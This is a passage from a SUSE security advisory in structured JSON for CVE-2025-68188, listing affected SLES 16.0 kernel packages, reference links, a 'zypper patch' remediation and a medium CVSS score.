"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
